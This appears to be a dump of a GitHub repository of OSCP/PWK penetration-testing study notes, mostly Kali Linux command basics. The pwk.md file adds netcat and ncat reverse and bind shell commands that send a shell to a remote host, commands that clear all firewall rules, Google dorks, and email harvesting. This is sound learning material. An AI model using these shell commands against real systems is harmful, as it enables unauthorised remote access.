├── 2020 ├── 1. Getting Comfortable With Kali Linux.md ├── 2. Command Line Fun.md ├── 3. Practical Tools.md ├── 4. Bash Scripting.md ├── 5. Passive Information Gathering.md └── README.md ├── README.md └── pwk.md /2020/1. Getting Comfortable With Kali Linux.md: -------------------------------------------------------------------------------- 1 | 2 | Getting Comfortable With Kali Linux 3 | ======================================================================================================== 4 | 5 | - Booting Up Kali Linux 6 | `64 Bit Kali is recommended` 7 | 8 | - Changing all the default password using passwd command 9 | `kali@kali:~# passwd` 10 | 11 | - Elevate privelages using sudo command 12 | `kali@kali:~# sudo whoami` 13 | 14 | - The Kali Menu 15 | `All Pentest tools are categoried in kali by there functions in Kali Menu` 16 | 17 | - The Kali Documentation 18 | `Useful For Trouble Shooting & Support` 19 | 20 | - Official Documentation URL 21 | https://docs.kali.org/ 22 | 23 | - Next Resource for support & trouble shooting 24 | https://forums.kali.org/ 25 | 26 | - Quick Reference for tools 27 | https://tools.kali.org/ 28 | 29 | - Bug Report 30 | https://bug.kali.org/ 31 | 32 | - Host the Official Manual Courses (such as kali linux revealed, metasploit unleashed,etc) 33 | https://kali.training 34 | 35 | - Finding Your Way Around Kali 36 | --------------------------------------------------------------------------------------------------------------------------- 37 | 38 | - The Linux FileSystem 39 | ``` 40 | Contains Basic Programs (such as ls, cat): /bin/ 41 | Contains Basic Programs (such as fdisk, makefs): /sbin/ 42 | Contains Temporary Files, typically deleted on boot : /tmp/ 43 | Contains Application (such as apt, nmap): /usr/bin/ 44 | Contains Application Support & Data Files : /usr/share/ 45 | ``` 46 | 47 | - Basic Linux Commands 48 | 49 | - Man Pages : Contains Manual Pages for Different Commands & Tools: 50 | ``` 51 | # Manual contains: Name, Synopsis, 
Description 52 | kali@kali:~# man ls 53 | ``` 54 | 55 | - Man Page Keyword search: 56 | `kali@kali:~# man -k passwd` 57 | 58 | - Man Page Keyword search using regular expression: 59 | `kali@kali:~# man -k '^passwd$'` 60 | 61 | ``` 62 | # Result 63 | kali@kali:~# passwd (1) - change user password 64 | kali@kali:~# passwd (5) - the password file 65 | ``` 66 | 67 | - Now after finding appropriate result, we can look its manual page: 68 | `kali@kali:~# man 5 passwd` 69 | 70 | - `apropos` : Do keyword search for manual pages, similar to above using `man -k`: 71 | `kali@kali:~# apropos partition` 72 | 73 | - Listing Files 74 | 75 | - To List All Files & Folder: 76 | `kali@kali:~# ls` 77 | 78 | - List Particular File: 79 | `kali@kali:~# ls /etc/apache2/sites-available/*.conf` 80 | 81 | - List Hidden Files & Folder in Single Line: 82 | `kali@kali:~# ls -a1` 83 | 84 | - Changing Directory 85 | `kali@kali:~# cd /usr/share/metasploit-framework/` 86 | 87 | - Print/Echo Present Working Directory 88 | `kali@kali:~# pwd` 89 | 90 | - Changing Directory to Root Path 91 | `kali@kali:~# cd ~` 92 | 93 | - Creating Directories 94 | `kali@kali:~# mkdir notes` 95 | 96 | ``` 97 | # This Command Will Create Two Folder, i.e module & one 98 | kali@kali:~# mkdir module one 99 | ``` 100 | 101 | Note: Whitespaces should be excluded, we can use (-) hypen instead of a space in name 102 | 103 | - Creating Directory which contains whitespace 104 | `kali@kali:~# mkdir "module one"` 105 | 106 | - Navigating Directory Which contains whitespace 107 | `kali@kali:~# cd module\ one/` 108 | 109 | - Moving One Directory Back 110 | `kali@kali:~# cd ..` 111 | 112 | - Moving Two Directory Back 113 | `kali@kali:~# cd ../..` 114 | 115 | - Removing Directory 116 | `kali@kali:~# rm -rf "module one"` 117 | 118 | - Making Directory & It's Sub-directory 119 | `kali@kali:~# mkdir -p test/{recon,exploit,report}` 120 | 121 | ``` 122 | # We Can Verify the Created Directory & Sub-directory Using **ls** 123 | kali@kali:~# 
ls -1 test/ 124 | 125 | # OUTPUT 126 | recon 127 | exploit 128 | report 129 | ``` 130 | 131 | - Finding Files In Kali Linux 132 | --------------------------------------------------------------------------------------------------------------------------- 133 | 134 | - `which` command: Searches the File in directory defined in $PATH: `echo $PATH` 135 | `which sdb` 136 | 137 | - `locate` command: Quickest Way to find file & directories within the FileSystem 138 | 139 | - Uses `locate.db` to find the file or directory which is updated on a regular basis using Cron Scheduler. 140 | 141 | - Database can be manually updated using this command: `sudo updatedb` 142 | 143 | - Searching file using locate: `locate sdb.exe` 144 | 145 | - `find` command: Most Complex & Flexible Search Tool among the 3 146 | 147 | - Searching a file from Root path that starts with sdb: `find / -name sdb*` 148 | 149 | - Managing Kali Linux Services 150 | --------------------------------------------------------------------------------------------------------------------------- 151 | 152 | - SSH Service: TCP based & listen by default on port 22 153 | 154 | - Start SSH Service: `sudo systemctl start ssh` 155 | 156 | - Verifying Whether SSH Service running or not: `sudo ss -antlp | grep sshd 157 | 158 | - Start SSH Service on Boot: `sudo systemctl enable ssh` 159 | 160 | - HTTP Service: TCP based & listen by default on port 80 161 | 162 | - Start Apache2 Service: `sudo systemctl start apache2` 163 | 164 | - Verifying Whether Apache2 Service running or not: `sudo ss -antlp | grep sshd 165 | 166 | - Start Apache2 Service on Boot: `sudo systemctl enable apache2` 167 | 168 | - To See Table of All Available Services: `systemctl list-unit-files` 169 | 170 | - Searching, Installing & Removing Tools 171 | --------------------------------------------------------------------------------------------------------------------------- 172 | 173 | - Aptitude Manager: Used to install, remove, upgrade tools on debian 
based systemctl 174 | 175 | - Updating Aptitude Manager: `sudo apt update` 176 | 177 | - Updating Installed Packages & Core System Tools to latest versions: `sudo apt upgrade` 178 | 179 | - Updating Single Package (such as metasploit-framework): `sudo apt upgrade metasploit-framework` 180 | 181 | - `apt-cache search`: Used to search whether a package is available in Kali repository 182 | `apt-cache search pure-ftpd` 183 | 184 | - `apt show`: Used to echo/display description of a package, e.g. `apt show resource-agents | less` 185 | 186 | - `apt install`: Used to Install Package, e.g. `sudo apt install pure-ftpd` 187 | 188 | - `apt remove --purge`: Used to Completely Remove Tool/Package from kali, e.g. `sudo apt remove --purge pure-ftpd` 189 | 190 | - `dpkg`: Core tool used to install package either directly or indirectly through apt 191 | 192 | - prefered for offline package installation: `sudo dpkg -i ./nano_3.2-2_amd64.deb` 193 | -------------------------------------------------------------------------------- /2020/2. 
Command Line Fun.md: -------------------------------------------------------------------------------- 1 | ## Table of Content 2 | - [Environment Variables](#environment-variables) 3 | * [Comman Environment Variables](#comman-environment-variables) 4 | * [Define Environment Variables using `export` cmd](#define-environment-variables-using-export-cmd) 5 | - [Tab Completion](#tab-completion) 6 | - [Bash History Tricks](#bash-history-tricks) 7 | - [Useful Keyboard Keys](#useful-keyboard-keys) 8 | - [Piping and Redirection](#piping-and-redirection) 9 | * [Redirecting to a new file](#redirecting-to-a-new-file) 10 | * [Redirecting to a existing file](#redirecting-to-a-existing-file) 11 | * [Redirecting from a file](#redirecting-from-a-file) 12 | * [Redirecting STDERR](#redirecting-stderr) 13 | * [Piping](#piping) 14 | - [Text Searching and Manipulation](#text-searching-and-manipulation) 15 | * [`grep`](#grep) 16 | * [`see`](#sed) 17 | * [`cut`](#cut) 18 | * [`awk`](#awk) 19 | - [Editing files from the Command Line](#editing-files-from-the-command-line) 20 | * [`nano`](#nano) 21 | * [`vi`](#vi) 22 | - [Comparing Files](#comparing-files) 23 | * [`comm`](#comm) 24 | * [`diff`](#diff) 25 | * [`vimdiff`](#vimdiff) 26 | - [Managing Processes](#managing-processes) 27 | * [Backgrounding Processes (bg)](#backgrounding-processes-bg) 28 | * [Jobs Controls (jobs and fg)](#jobs-controls-jobs-and-fg) 29 | * [Process Control (ps and kill)](#process-control-ps-and-kill) 30 | - [File and Command Monitoring](#file-and-command-monitoring) 31 | * [`tail`](#tail) 32 | * [`watch`](#watch) 33 | - [Downloading Files](#downloading-files) 34 | * [`wget`](#wget) 35 | * [`curl`](#curl) 36 | * [`axel`](#axel) 37 | - [Customizing the Bash Environment](#customizing-the-bash-environment) 38 | * [Bash History Customization](#bash-history-customization) 39 | * [Alias](#alias) 40 | * [Persistent Bash Customization](#persistent-bash-customization) 41 | 42 | Command Line Fun 43 | ================= 44 | 
Introductory Look to Popular Linux Command Line Program 45 | 46 | Environment Variables 47 | --------------------- 48 | * When opening a terminal window, new bash process which has it's own Bash Environment Variables are initialised. 49 | * Environment Variables: Form of Global storage inherited by any application which will run during terminal session 50 | 51 | ### Comman Environment Variables: 52 | 53 | 1. PATH : `kali@kali:~$ echo $PATH` 54 | 2. USER : `kali@kali:~$ echo $USER` 55 | 3. HOME : `kali@kali:~$ echo $HOME` 56 | 4. PWD : `kali@kali:~$ echo $PWD` 57 | 58 | ### Define Environment Variables using `export` cmd 59 | * Let's say you don't want to type IP address repeatedly then you can export the `$ip` variable & can use it across terminal sessions 60 | ``` 61 | kali@kali:~$ export $ip=192.168.43.70 62 | kali@kali:~$ ping -c 2 $ip 63 | ``` 64 | 65 | * Variables exported without `export` cmd are only accessible in that current bash session 66 | ``` 67 | kali@kali:~$ lol="Rasode Mein Kon Tha?" 68 | kali@kali:~$ echo $lol # We will get value of $lol 69 | kali@kali:~$ bash 70 | kali@kali:~$ echo $lol # No Value 71 | kali@kali:~$ exit 72 | kali@kali:~$ echo $lol # Again can access value of $lol 73 | ``` 74 | * **NOTE**: Variables defined using `export` cmd can be accessed using different terminal window 75 | 76 | * Viewing Default Kali Linux Environment Variables: `env` 77 | 78 | Tab Completion 79 | -------------- 80 | * Used in auto text completion. 81 | 82 | Bash History Tricks 83 | ------------------- 84 | * We can see previous executed cmds using `history` cmd 85 | 86 | * For executing last executed terminal cmd, use `!!` double exclamation mark. 87 | 88 | * Bash terminal history is saved in `.bash_history` file in the user home directory: `tail -n 3 .bash_history` 89 | 90 | * Two Common Env Variables: 91 | 1. `$HISTSIZE` : Controls no. Of cmds stored in memory for current terminal session. 92 | 2. 
`$HISTFILESIZE` : Controls How many cmds are kept in history file. 93 | 94 | * These 2 env variables can be edited according to are needs. 95 | 96 | Useful Keyboard Keys 97 | -------------------- 98 | 1. `Up ArrowKey`: Use to select/scroll previous cmds in Upwards direction. 99 | 2. `Down ArrowKey`: Use to select/scroll cmds in Downwards direction. 100 | 3. `CTRL + R`: Reverse I search facility, can search previously executed cmds using Cmd Search Feature. 101 | 102 | Piping and Redirection 103 | ---------------------- 104 | * Every program executed from terminal has 3 streams connected to it that serves the communication channel to external env. 105 | 1. Standard Input (`STDIN`): Data fed into the program. 106 | 2. Standard Output (`STDOUT`): Output from the program. (defaults to terminal) 107 | 3. Standard Error (`STDERR`): Error message. (defaults to terminal) 108 | 109 | ### Redirecting to a new file 110 | 111 | * Redirecting output to a non existing file will leads to file creation: `kali@kali:~$ echo "Corona Go! Go Corona" > EminemRap.txt` 112 | Typical file reading: `kali@kali:~$ cat EminemRap.txt` 113 | 114 | * If file already exist, then that file will be overwritted: `kali@kali:~$ echo "Selfie meinai leli aaj" > EminemRap.txt` 115 | 116 | * **Note** : Be very careful while file redirection, there is no undo function. 117 | 118 | ### Redirecting to a existing file 119 | * Use `>>` sign to append data to a existing file: `kali@kali:~$ echo "Chura ke dil mera goliya chali" >> EminemRap.txt` 120 | 121 | ### Redirecting from a file 122 | * Use `<` sign to redirect file data to any utility: `kali@kali:~$ wc -m < EminemRap.txt` 123 | * Above cmd will count total words a file. 124 | 125 | ### Redirecting STDERR 126 | * We can redirect standard error of particular command using `2>`: `kali@kali:~$ ls . 
/test 2>error.txt` 127 | * Example content of error.txt file: `ls: cannot excess './test': No such file or directory` 128 | 129 | ### Piping 130 | * Redirecting output of one cmd as a input for another cmd: `kali@kali:~$ cat error.txt | wc -m` 131 | * Above cmd will perforn word count of `error.txt` file. 132 | 133 | `kali@kali:~$ cat error.txt | wc -m > count.txt` 134 | `kali@kali:~$ cat count.txt` 135 | 136 | Text Searching and Manipulation 137 | ------------------------------- 138 | ### `grep` 139 | * Searches text file for given regex & outputs any line containing a match to stdout (stdout == usually terminal) 140 | * Example: `kali@kali:~$ ls -la /usr/bin | grep zip` 141 | * Use `man` cmd to learn more about `grep` 142 | 143 | ### `sed` 144 | * Powerful stream editor + very complex. It performs text editing in stream of text. 145 | * Example: `kali@kali:~$ echo "Go Katrina! Go" | sed 's/Katrina/Corona/' ` 146 | * Example Output: `Go Corona! Go` 147 | 148 | ### `cut` 149 | * Used to cut a stdout of one cmd to pieces on the basic of given delimiter, then it also be used to select a particular part of string. 150 | * Commonly used flags: `-d` for Delimiter & `-f` for Field Selection. 151 | * Example: `kali@kali:~$ echo rahul, saksham, rohit | cut -d "," -f 2` 152 | * Example Output: `saksham` 153 | * Extracting list of users from etc/passed file: `kali@kali:~$ cut -d ":" -f 1 /etc/passwd ` 154 | 155 | ### `awk` 156 | * Programming language designed for text processing. 157 | * Typically used for data extraction and reporting tools. 158 | * Only going to scratch the surface. 
159 | * Splitting stdout of one cmd using delimeter, Extracting 1st & 3rd part & then finally printing it: `kali@kali:~$ echo "hello::there::friends" | awk -F "::" '{print $1, $3}' ` 160 | * Example Output: `hello, friends` 161 | 162 | Editing files from the Command Line 163 | ----------------------------------- 164 | ### `nano` 165 | * Opening file using `nano`: `nano anyfilename.txt` 166 | * Nano commands menu is located at the bottom. 167 | * Important Memorable cmds: 168 | - `CTRL + O` : Write changes to a file. 169 | - `CTRL + K` : To cut current line. 170 | - `CTRL + U` : To uncut a line & paste it at cursor location. 171 | - `CTRL + W`: To search within a line. 172 | - `CTRL + X` : Use to exit. 173 | 174 | ### `vi` 175 | * Opening file using `vi`: `vi anyfilename.txt` 176 | * Press `i` key to Escape Command Mode & start typing in text file. 177 | * Press `esc` key in order to return back to Command Mode. 178 | * Press `dd` to remove the current line. 179 | * Press `yy` to copy the current line. 180 | * Press `p` to paste the clipboard context. 181 | * Press `x` to delete the current character under the cursor. 182 | * Press `:w` to write current file to disk & remain open in `vi` 183 | * Press `:q!` to quit without writing a file. 184 | * Press `:wq!` to quickly save the file & quit `vi` 185 | 186 | Comparing Files 187 | --------------- 188 | ### `comm` 189 | * Compares two text file, displaying the line that are unique to each one as well those lines that are common. 
190 | * Example File-A & File-B: 191 | ``` 192 | kali@kali:~$ cat File-A.txt 193 | 192.168.1.1 194 | 192.168.1.2 195 | 192.168.1.3 196 | 192.168.1.4 197 | 192.168.1.5 198 | kali@kali:~$ cat File-B.txt 199 | 192.168.1.1 200 | 192.168.1.3 201 | 192.168.1.4 202 | 192.168.1.5 203 | 192.168.1.6 204 | ``` 205 | 206 | * File Comparison example using `comm`: 207 | ``` 208 | kali@kali:~$ comm File-A.txt File-B.txt 209 | 192.168.1.1 210 | 192.168.1.2 211 | 192.168.1.3 212 | 192.168.1.4 213 | 192.168.1.5 214 | 192.168.1.6 215 | ``` 216 | * `192.168.1.2` is unique to 1st file, thus it is displayed in 1st column. 217 | * `192.168.1.6` is unique to 2nd file, thus it is displayed in 2nd column. 218 | * Rest all common IPs/Lines are displayed in the 3rd column. 219 | * `-1` , `-2` and `-3` flags could be given to `comm` in order to suppress 1st, 2nd or 3rd column, according to our need. For example: 220 | ``` 221 | kali@kali:~$ comm -12 File-A.txt File-B.txt 222 | 192.168.1.1 223 | 192.168.1.3 224 | 192.168.1.4 225 | 192.168.1.5 226 | ``` 227 | 228 | ### `diff` 229 | * Compares difference b/w files similar to `comm`, but it is more complex & support many output formats. 230 | * Two famous Formats: 231 | 1. Context Format: `kali@kali:~$ diff -c File-A.txt File-B.txt` 232 | 2. Unified Format: `kali@kali:~$ diff -u File-A.txt File-B.txt` 233 | 234 | ### `vimdiff` 235 | * It open vim (extended version of vi), with multiple files, one in each window. 236 | * Difference b/w files is highlighted, making it easier to inspect them. 237 | 238 | - Useful shortcuts: 239 | * Press `CTRL + W + Arrow Key` for switching b/w windows 240 | * Press `] + C` will jump the cursor to next change in the diff. 241 | * `[ + C` will jump it to the previous change. 242 | * Press `D + O` will get a change in other window and put it in current window. 243 | * Press `D + P` will put the change in other window from the current one. 
244 | * Press `:q!` for quitting vimdiff (Same shortcuts as vi) 245 | 246 | Managing Processes 247 | ------------------ 248 | * Linux kernel manages multitasking through the use of process. 249 | * Kernel maintains info about each processes to help keep things organised. 250 | * Each process is assigned a no. called `process id` 251 | 252 | * Linux shell introduces the concept of `jobs` to ease our workflow during terminal session. For ex: `kali@kali:~$ cat errors.txt | wc -m` This whole cmd will be considered as one `job`. 253 | 254 | * `jobs` helps us to suspend or resume the execution of particular cmd. 255 | 256 | ### Backgrounding Processes (bg) 257 | * Helps us to make the execution of cmd in background, leaving the shell free for further use. 258 | * `&` sign at the end of a cmd, will put the cmd in bg. 259 | 260 | Ex: `kali@kali:~$ ping -c 400 localhost > ping_result.txt &` 261 | 262 | * Stopping the execution of cmd using `CTRL + Z` and then typing `bg` cmd will run the last cmd in background. Ex: `kali@kali:~$ bg` 263 | 264 | ### Jobs Controls (jobs and fg) 265 | * `jobs` utility list the jobs that are running in current terminal session. 266 | * Running `fg %JOBNumber` returns a job in foreground. Example: `fg %1` 267 | * If only one job running in the bg, then typing `fg` without any additional flag will return that single job in the foreground. 268 | 269 | ### Process Control (ps and kill) 270 | * `ps` : Process status, list all the running process in a Linux/Unix system, Swizz army knife for process management. 271 | * Listing all process with full format listing: `kali@kali:~$ ps -ef` where `-e` & `-f` stands for `select all processes` and `full format listing` respectively. 
272 | 273 | * Finding process Id using command name: `kali@kali:~$ ps -fC leafpad` 274 | 275 | * Killing process using process id: `kali@kali:~$ kill ProcessID` 276 | 277 | * Verifying process termination using `ps`: `kali@kali:~$ ps -fC leafpad` 278 | 279 | File and Command Monitoring 280 | --------------------------- 281 | ### `tail` 282 | * Monitoring apache logs using tail: `kali@kali:~$ sudo tail -f /var/log/apache2/access.log` 283 | * Extracting last `2` lines from file: `kali@kali:~$ sudo tail -n2 /etc/lsb-release` where `2` is the desired no. of last lines. 284 | 285 | ### `watch` 286 | * Used to run designated cmd at regular intervals, by default it runs for every 2 seconds which could be changed using `-nX` flag where `X` is the interval in seconds. 287 | * Example (This cmd will list logged in users output from the `w` cmd once very 5 seconds) : `kali@kali:~$ watch -n 5 w` 288 | 289 | Downloading Files 290 | ----------------- 291 | ### `wget` 292 | * Utility to download file from the internet. 293 | * Example (Downloading file & saving it with different name) : `kali@kali:~$ wget -O lol.txt https://example.com/text file.txt` 294 | * Refer to its docs for more info: `kali@kali:~$ wget --help | less` 295 | 296 | ### `curl` 297 | * Use to transfer data to and from a server using a host of protocol. 298 | * Can be used to Download and Upload files & build complex request. 299 | * Example (Download & save file with different name) : `kali@kali:~$ curl -o lol.txt https://example.com/textfile.txt` 300 | * Very versatile tool, lots of use case scenarios & ample docs are available online. 301 | 302 | ### `axel` 303 | * It is Download accelerator that transfers a file from an FTP or HTTP server through multiple connections. 304 | * It has vast variety of options. Common option: `kali@kali:~$ axel -a -n 20 -o lol.pdf https://example.com/lol.pdf` 305 | * `-a` : For more concise progress indicator. 306 | * `-n` : For no. Of multiple connections to use. 
307 | * `-o` : For different output name. 308 | 309 | * Extremely useful for downloading large file. 310 | 311 | Customizing the Bash Environment 312 | -------------------------------- 313 | ### Bash History Customization 314 | * Whether or not to remove duplicate cmds: `kali@kali:~$ export HISTCONTROL=ignoredups` 315 | * Filtering out basic cmds : `kali@kali:~$ export HISTIGNORE="&:ls:[bf]g:exit:history"` 316 | * For showing TimeFormat in history output cmd: `kali@kali:~$ export HISTTIMEFORMAT="%F %T"` 317 | Other time format can be found in strftime man page: `kali@kali:~$ man strfman` 318 | 319 | ### Alias 320 | * Defining large cmd to shorter name 321 | * Example: `kali@kali:~$ alias lsa=ls -la` 322 | * We can see defined alias using `kali@kali:~$ alias` cmd without giving any argument/flag. 323 | 324 | ### Persistent Bash Customization 325 | * Behavior of interactive shell in bash is determined by system's `/etc/bash.bashrc` file. 326 | * Editing this `bash.bashrc` bash file, will leads to persistent bash customization. 327 | 328 | 329 | -------------------------------------------------------------------------------- /2020/3. Practical Tools.md: -------------------------------------------------------------------------------- 1 | Practical Tools 2 | =============== 3 | -------------------------------------------------------------------------------- /2020/4. Bash Scripting.md: -------------------------------------------------------------------------------- 1 | Bash Scripting 2 | ============== 3 | -------------------------------------------------------------------------------- /2020/5. 
Passive Information Gathering.md: -------------------------------------------------------------------------------- 1 | Passive Information Gathering 2 | ============================= 3 | -------------------------------------------------------------------------------- /2020/README.md: -------------------------------------------------------------------------------- 1 | 2 | # OSCP - PWK 2020 (Penetration testing With Kali) NOTES 3 | OSCP Notes which covers whole PWK 2020 Course Curriculum 4 | > Written By: Pushpender Singh 5 | 6 | ## Table of Content 7 | - [Getting Comfortable With Kali Linux](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/1.%20Getting%20Comfortable%20With%20Kali%20Linux.md) 8 | - [Command Line Fun](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/2.%20Command%20Line%20Fun.md) 9 | - [Practical Tools](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/3.%20Practical%20Tools.md) 10 | - [Bash Scripting](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/4.%20Bash%20Scripting.md) 11 | - [Passive Information Gathering](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/5.%20Passive%20Information%20Gathering.md) 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSCP Notes Written From PWK (Penetration testing With Kali) Course Material 2 | > Written By: Pushpender Singh 3 | 4 | ## Table of Contents 5 | - [PWK Old Notes](https://github.com/PushpenderIndia/oscp-notes/blob/master/pwk.md) 6 | - [PWK 2020 Notes](https://github.com/PushpenderIndia/oscp-notes/blob/master/2020/README.md) 7 | 8 | `Remember : Enumeration is the KEY : )` 9 | 10 | ### **Try Harder** 11 | -------------------------------------------------------------------------------- /pwk.md: -------------------------------------------------------------------------------- 1 | # OSCP - PWK (PenTesting With 
Kali) NOTES 2 | Full OSCP Notes which completes whole OSCP Course Curriculum 3 | 4 | ## Table of Contents 5 | - [Kali Linux](#kali-linux) 6 | - [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning) 7 | * [Passive Information Gathering](#passive-information-gathering) 8 | * [Active Information Gathering](#active-information-gathering) 9 | * [Port Scanning](#port-scanning) 10 | * [Enumeration](#enumeration) 11 | * [HTTP Enumeration](#http-enumeration) 12 | - [Buffer Overflows and Exploits](#buffer-overflows-and-exploits) 13 | - [Shells](#shells) 14 | - [File Transfers](#file-transfers) 15 | - [Privilege Escalation](#privilege-escalation) 16 | * [Linux Privilege Escalation](#linux-privilege-escalation) 17 | * [Windows Privilege Escalation](#windows-privilege-escalation) 18 | - [Client, Web and Password Attacks](#client-web-and-password-attacks) 19 | * [Client Attacks](#client-attacks) 20 | * [Web Attacks](#web-attacks) 21 | * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities) 22 | * [Database Vulnerabilities](#database-vulnerabilities) 23 | * [Password Attacks](#password-attacks) 24 | * [Password Hash Attacks](#password-hash-attacks) 25 | - [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling) 26 | - [The Metasploit Framework](#the-metasploit-framework) 27 | - [Bypassing Antivirus Software](#bypassing-antivirus-software) 28 | 29 | Kali Linux 30 | ======================================================================================================== 31 | 32 | - Set the Target IP Address to the `$ip` system variable 33 | `export ip=192.168.1.100` 34 | 35 | - Find the location of a file 36 | `locate sbd.exe` 37 | 38 | - Search through directories in the `$PATH` environment variable 39 | `which sbd` 40 | 41 | - Find a search for a file that contains a specific string in it’s 42 | name: 43 | `find / -name sbd\*` 44 | 45 | - Show active internet connections 46 | `netstat -lntp` 47 | 48 | - 
Change Password 49 | `passwd` 50 | 51 | - Verify a service is running and listening 52 | `netstat -antp |grep apache` 53 | 54 | - Start a service 55 | `systemctl start ssh ` 56 | 57 | `systemctl start apache2` 58 | 59 | - Have a service start at boot 60 | `systemctl enable ssh` 61 | 62 | - Stop a service 63 | `systemctl stop ssh` 64 | 65 | - Unzip a gz file 66 | `gunzip access.log.gz` 67 | 68 | - Unzip a tar.gz file 69 | `tar -xzvf file.tar.gz` 70 | 71 | - Search command history 72 | `history | grep phrase_to_search_for` 73 | 74 | - Download a webpage 75 | `wget http://www.cisco.com` 76 | 77 | - Open a webpage 78 | `curl http://www.cisco.com` 79 | 80 | - String manipulation 81 | 82 | - Count number of lines in file 83 | `wc -l index.html` 84 | 85 | - Get the start or end of a file 86 | `head index.html` 87 | 88 | `tail index.html` 89 | 90 | - Extract all the lines that contain a string 91 | `grep "href=" index.html` 92 | 93 | - Cut a string by a delimiter, filter results then sort 94 | `grep "href=" index.html | cut -d "/" -f 3 | grep "\\." 
| cut -d '"' -f 1 | sort -u` 95 | 96 | - Using Grep and regular expressions and output to a file 97 | `cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt` 98 | 99 | - Use a bash loop to find the IP address behind each host 100 | `for url in $(cat list.txt); do host $url; done` 101 | 102 | - Collect all the IP Addresses from a log file and sort by 103 | frequency 104 | `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn` 105 | 106 | - Decoding using Kali 107 | 108 | - Decode Base64 Encoded Values 109 | 110 | `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode` 111 | 112 | - Decode Hexidecimal Encoded Values 113 | `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps` 114 | 115 | - Netcat - Read and write TCP and UDP Packets 116 | 117 | - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems): 118 | [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/) 119 | 120 | - Connect to a POP3 mail server 121 | `nc -nv $ip 110` 122 | 123 | - Listen on TCP/UDP port 124 | `nc -nlvp 4444` 125 | 126 | - Connect to a netcat port 127 | `nc -nv $ip 4444` 128 | 129 | - Send a file using netcat 130 | `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe` 131 | 132 | - Receive a file using netcat 133 | `nc -nlvp 4444 > incoming.exe` 134 | 135 | - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that... 
136 | 137 | whereis nc 138 | nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz 139 | 140 | /bin/nc.traditional -e /bin/bash 1.2.3.4 4444 141 | 142 | 143 | - Create a reverse shell with Ncat using cmd.exe on Windows 144 | `nc.exe -nlvp 4444 -e cmd.exe` 145 | 146 | or 147 | 148 | `nc.exe -nv -e cmd.exe` 149 | 150 | - Create a reverse shell with Ncat using bash on Linux 151 | `nc -nv $ip 4444 -e /bin/bash` 152 | 153 | - Netcat for Banner Grabbing: 154 | 155 | `echo "" | nc -nv -w1 ` 156 | 157 | - Ncat - Netcat for Nmap project which provides more security avoid 158 | IDS 159 | 160 | - Reverse shell from windows using cmd.exe using ssl 161 | `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl` 162 | 163 | - Listen on port 4444 using ssl 164 | `ncat -v $ip 4444 --ssl` 165 | 166 | - Wireshark 167 | - Show only SMTP (port 25) and ICMP traffic: 168 | 169 | `tcp.port eq 25 or icmp` 170 | 171 | - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet: 172 | 173 | `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16` 174 | 175 | - Filter by a protocol ( e.g. 
SIP ) and filter out unwanted IPs: 176 | 177 | `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip` 178 | 179 | - Some commands are equal 180 | 181 | `ip.addr == xxx.xxx.xxx.xxx` 182 | 183 | Equals 184 | 185 | `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx ` 186 | 187 | ` ip.addr != xxx.xxx.xxx.xxx` 188 | 189 | Equals 190 | 191 | `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx` 192 | 193 | - Tcpdump 194 | 195 | - Display a pcap file 196 | `tcpdump -r passwordz.pcap` 197 | 198 | - Display ips and filter and sort 199 | `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head` 200 | 201 | - Grab a packet capture on port 80 202 | `tcpdump tcp port 80 -w output.pcap -i eth0` 203 | 204 | - Check for ACK or PSH flag set in a TCP packet 205 | `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap` 206 | 207 | - IPTables 208 | 209 | - Deny traffic to ports except for Local Loopback 210 | 211 | `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP ` 212 | 213 | `iptables -A INPUT -p tcp --destination-port 9991 ! 
-d $ip -j DROP` 214 | 215 | - Clear ALL IPTables firewall rules 216 | 217 | ```bash 218 | iptables -P INPUT ACCEPT 219 | iptables -P FORWARD ACCEPT 220 | iptables -P OUTPUT ACCEPT 221 | iptables -t nat -F 222 | iptables -t mangle -F 223 | iptables -F 224 | iptables -X 225 | iptables -t raw -F iptables -t raw -X 226 | ``` 227 | 228 | Information Gathering & Vulnerability Scanning 229 | =================================================================================================================================== 230 | 231 | - Passive Information Gathering 232 | --------------------------------------------------------------------------------------------------------------------------- 233 | 234 | - Google Hacking 235 | 236 | - Google search to find website sub domains 237 | `site:microsoft.com` 238 | 239 | - Google filetype, and intitle 240 | `intitle:"netbotz appliance" "OK" -filetype:pdf` 241 | 242 | - Google inurl 243 | `inurl:"level/15/sexec/-/show"` 244 | 245 | - Google Hacking Database: 246 | https://www.exploit-db.com/google-hacking-database/ 247 | 248 | - SSL Certificate Testing 249 | [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html) 250 | 251 | - Email Harvesting 252 | 253 | - Simply Email 254 | `git clone https://github.com/killswitch-GUI/SimplyEmail.git ` 255 | 256 | `./SimplyEmail.py -all -e TARGET-DOMAIN` 257 | 258 | - Netcraft 259 | 260 | - Determine the operating system and tools used to build a site 261 | https://searchdns.netcraft.com/ 262 | 263 | - Whois Enumeration 264 | 